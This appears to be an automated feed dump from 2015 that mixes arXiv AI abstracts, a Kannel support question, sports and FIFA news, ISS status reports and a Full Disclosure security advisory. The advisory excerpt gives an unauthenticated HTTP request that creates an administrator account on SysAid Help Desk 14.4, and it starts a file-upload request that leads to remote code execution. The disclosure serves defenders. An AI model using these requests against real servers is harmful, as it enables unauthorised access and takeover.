Often these high-level descriptions are constructed without considering the ultimate reason for needing them in the first place. Here, we formalize and quantify one such purpose: the need to predict observables of interest concerning the high-dimensional system with as high accuracy as possible, while minimizing the computational cost of doing so. The resulting State Space Compression (SSC) framework provides a guide for how to solve for the {optimal} high-level description of a given dynamical system, rather than constructing it based on human intuition alone.

In this preliminary report, we introduce SSC, and illustrate it with several information-theoretic quantifications of "accuracy", all with different implications for the optimal compression. We also discuss some other possible applications of SSC beyond the goal of accurate prediction. These include SSC as a measure of the complexity of a dynamical system, and as a way to quantify information flow between the scales of a system.



from cs.AI updates on arXiv.org http://ift.tt/1vmpNlX
via IFTTT

Problem Theory. (arXiv:1412.1044v4 [cs.AI] UPDATED)

The Turing machine, as it was presented by Turing himself, models the calculations done by a person. This means that we can compute whatever any Turing machine can compute provided we have enough time and memory, and therefore we are Turing complete. The question addressed here is why, Why are we Turing complete? Being Turing complete also means that somehow our brain implements the function that a universal Turing machine implements. The point is that evolution achieved Turing completeness, and then the explanation should be evolutionary. Nevertheless, our explanation is mathematical. The trick is to introduce a mathematical theory of problems, under the basic assumption that solving more problems provides more survival opportunities. Then we construct a series of resolvers, where each resolver is defined by its computing capacity, that exhibits the following property: all problems solved by a resolver are also solved by the next resolver in the series if certain condition is satisfied. The last of the conditions is to be Turing complete. This series defines a resolvers hierarchy that could be seen as a first and broad description of the evolution of cognition, where achieving Turing completeness is the final step. Then the answer to our question would be: to solve most problems. By the way, the problem theory defines adaptation and learning, and it shows that there are just three ways to resolve any problem. And, most importantly, this theory demonstrates how problems can be used to found mathematics and computing on biology.



from cs.AI updates on arXiv.org http://ift.tt/1yhG7X1
via IFTTT

Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks. (arXiv:1502.05698v6 [cs.AI] UPDATED)

One long-term goal of machine learning research is to produce methods that are applicable to reasoning and natural language, in particular building an intelligent dialogue agent. To measure progress towards that goal, we argue for the usefulness of a set of proxy tasks that evaluate reading comprehension via question answering. Our tasks measure understanding in several ways: whether a system is able to answer questions via chaining facts, simple induction, deduction and many more. The tasks are designed to be prerequisites for any system that aims to be capable of conversing with a human. We believe many existing learning systems can currently not solve them, and hence our aim is to classify these tasks into skill sets, so that researchers can identify (and then rectify) the failings of their systems. We also extend and improve the recently introduced Memory Networks model, and show it is able to solve some, but not all, of the tasks.



from cs.AI updates on arXiv.org http://ift.tt/1ApWocn
via IFTTT

Re: Kannel and FreeBSD

Kannel and FreeBSD

Hello. Recently was updated the package Kannel on FreeBSD ports. I am testing and it's working, but there are some messages on log like these: After a send by ":13013/cgi-bin/sendsms" ==> /var/log/kannel/smsbox.log <== 2015-05-18 09:57:56 [9014] [1] ERROR: Error reading from fd 26: 2015-05-18 09:57:56 [9014] [1] ERROR: System error 54: Connection reset by peer 2015-05-18 09:57:56 [9014] [1] ERROR: Error reading from fd 27: 2015-05-18 09:57:56 [9014] [1] ERROR: System error 54: Connection reset by peer ==> /var/log/kannel/bearerbox.log <== 2015-05-18 09:59:25 [9004] [1] ERROR: Error reading from fd 34: 2015-05-18 09:59:25 [9004] [1] ERROR: System error 54: Connection reset by peer

Source: Gmail -> IFTTT-> Blogger

[FD] [Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)

Hi, tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed. Full advisory below, and a copy can be obtained at [1]. 5 Metasploit modules have been released and currently awaiting merge in the moderation queue [2]. Regards, Pedro [1]: http://ift.tt/1Q7WeRR [2]: http://ift.tt/1EXE4WX http://ift.tt/1Q7WcZZ http://ift.tt/1EXE4WZ http://ift.tt/1Q7Wd01 http://ift.tt/1EXE6hF >> Multiple vulnerabilities in SysAid Help Desk 14.4 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 03/06/2015 / Last updated: 03/06/2015 >> Background on the affected product: "SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance." Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon. All vulnerabilities affect both the Windows and Linux versions unless otherwise noted. >> Technical details: 1) Vulnerability: Administrator account creation CVE-2015-2993 (same CVE as #10) Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 This creates an account with the following credentials: mr_lit:secret Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted. 2) Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution) CVE-2015-2994 Constraints: valid administrator account needed (see #1 to create a valid admin account) Affected versions: unknown, at least 14.4 POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

Registration module: an Anonymous user added an event - how did this happen

A month ago, I added the Registration module and created an Content-Type for an event and setup an event page, etc. I need to allow Anonymous ...

from Google Alert - anonymous http://ift.tt/1EXAQCJ
via IFTTT

Judge in Blazer case unsure how to pronounce FIFA

NEW YORK (AP) FIFA may be famous throughout the world. In the Brooklyn court room of U.S. District Judge U.S. District Judge Raymond J. Dearie, not so much.

from FOX Sports Digital http://ift.tt/1H1uNDh
via IFTTT

Orioles: OF Alejandro De Aza traded to Red Sox for cash; .214 BA in 30 games before being DFA'd last week (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Dealing with Anonymous Posting Sites

The concept of anonymous message posting predates the Internet, going back to the early dial-up Usenet newsgroups and message boards. With the ...

from Google Alert - anonymous http://ift.tt/1Jm8v0Z
via IFTTT

FIFA executive committee member Blazer admitted bribes

NEW YORK (AP) Former FIFA executive committee member Chuck Blazer told a U.S. federal judge that he and others on the governing body's ruling panel agreed to receive bribes to vote for South Africa to host the 2010 World Cup.

from FOX Sports Digital http://ift.tt/1Ii4zhi
via IFTTT

I have a new follower on Twitter


Adam Greenberg
I do climate justice, human rights/soc justice, Olympics. SustainUS, @350Mass, @HuffingtonPost blogger. Youth delegate to UN climate negotiations
Globetrotter

Following: 5194 - Followers: 4789

June 03, 2015 at 03:58PM via Twitter http://twitter.com/Pragmactivist99

The Pirate Bay Co-Founder Released From Swedish Prison

Fredrik Neij, the third and the last founder of the infamous file-sharing website The Pirate Bay, was released on Monday from a Swedish prison. Neij, who goes by the online moniker "TiAMO", was arrested by Thai immigration authorities at the end of November 2014 while he was trying to cross the border illegally from Laos to Thailand and then extradited to a prison in Skänninge, Sweden.


from The Hacker News http://ift.tt/1cxSE0H
via IFTTT

Display duplicated separator divs as empty panes for anonymous users

Display duplicated separator divs as empty panes for anonymous users. Patch (to be ported). Project: Pileup Panes. Component: Code. Priority:.

from Google Alert - anonymous http://ift.tt/1JqOdSe
via IFTTT

ISS Daily Summary Report – 06/02/2015

Fluid Shifts:  Fluid Shift operations continued today in the Russian Service Module (SM).  Kelly was the first to don the Lower Body Negative Pressure (LBNP/Chibis) device while Kornienko, with ground support in Moscow, assisted with medical monitoring.  While Kelly was subjected to the negative pressure (pulling the fluid toward the feet), Padalka, with remote guidance in Houston, performed arterial and venous measurements of the head and neck; cardiac, ophthalmic, and portal vein measurements; and tissue thickness of various body parts using the Human Research Facility (HRF) ultrasound.  Following Kelly’s Chibis session, Kornienko then donned the Chibis and Padalka acted as the medical monitor with Kelly as the ultrasound operator.  Following the scans, Kelly deconfigured the ultrasound and configured the Cerebral and Cochlear Fluid Pressure (CCFP) and Distortion Product Otoacoustic Emissions (DPOAE) for tomorrow’s operations. Human Research Program (HRP) Collections: Cristoforetti performed urine collections for her Return minus 15 (R-15) day Biochemical Profile, Cardio Ox, and Repository experiments.  After collection, the samples were placed in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a later flight. Advanced Colloids Experiment Heated-1 (ACE-H1) Configuration: Virts accessed the Fluids Integrated Rack (FIR) to swap the ACE-Microscopy-3 (M3) experiment to the ACE-H1 experiment.  He removed ACE-M3, changed out cables and configured the Light Microscopy Module (LMM) for the next set of ACE-H1 runs (two planned and one contingency) including placing wipes and oil dispensers inside the LMM Auxiliary Fluids Container (AFC). The experiment examines densely packed microscopic spheres, or colloidal mixtures, to study their transition from ordered crystals into disordered glass. The particles are fluorescent and change size in different temperatures so scientists are able to see how they move and change forms as they are heated and cooled. Studying particle interactions without the influence of gravity improves scientists’ ability to understand how increasing disorder in a crystal material affects the freezing, melting, aging and structural integrity. Extravehicular Activity (EVA) Fan Pump Separator (FPS) Remove & Replace (R&R) Prep: In preparation for tomorrow’s and Thursday’s planned R&R of Extravehicular Mobility Unit (EMU) 3010 FPS, Cristoforetti gathered and staged tools required for the activity. Today’s Planned Activities All activities were completed unless otherwise noted. Fluid Shifts config Regeneration of БМП Ф2 Micropurification Cartridge (start) ARED video setup Fluid Shifts activation of Ultrasound equipment Fluid Shifts scan – operator Fluid Shifts Chibis Replace battery pack in CDM Configure CDM to record data by clearing Data Logger prior to use Set up and activate CDM, then don CDM for CDM Crew Work Day Worn session Chibis don Fluid Shifts scan – subject Chibis doff Fluid Shifts photos MELFI 3 Ice Brick Insert 2 Synthetic Muscle Historical Documentation Photography HRF Generic Urine Collection Subject HRF Generic Sample MELFI Retrieve And Insertion Operations EHS – Formaldehyde Monitoring Kit (FMK) Deployment Operations at LAB location EHS GSF sampling Fluid Shifts Ultrasound Service Module Preparation Fluid Shifts Ultrasound Service Module Scan Operator Fluid Shifts Ultrasound Service Module Stow Fluid Shifts HRF PC  And CCFP Service Module Setup Thermal Container Chamber Closeout MSPR Components Deactivation Fluids Integrated Rack Rack Doors Open ACE-H1 Cable Configuration ACE-H1 Hardware Configuration РК4 Installation of Video Monitor and Connecting it to Converter via cable EHS Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis EVA EMU 3010 FPS R&R Tool Gather FLUID SHIFTS. Disconnection & disassembly PK-4 Video Monitor checkout РК-4 Starting Pressurization and Pressure Checkout of Vozdukh Atmosphere Purification System [СОА] using Control Panel Rodent Research MELFI Retrieve Rodent Research Habitat Restock 1 Video Footage for Nauka 2.0 TV Channel Water Refill Kit Review JEM System Laptop Terminal Reboot HRF Generic Urine Collection Subject HRF Generic Frozen Blood Collection Setup Transfer Operations – Prepack of US items for return on 41S Water Refill Kit Habitat H2O Fill RGN Recycle Tank Fill Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. High Beta configuration Three-Day Look Ahead: Wednesday, 06/03: FPS R&R Part 1, HAPTICS-2 PROTOCOL1B Ops, Fluid Shifts  Thursday, 06/04: FPS R&R Part 2, Fluid Shifts Friday, 06/05: PMM cleanup, EVA FPS pack for return QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1AKBp88
via IFTTT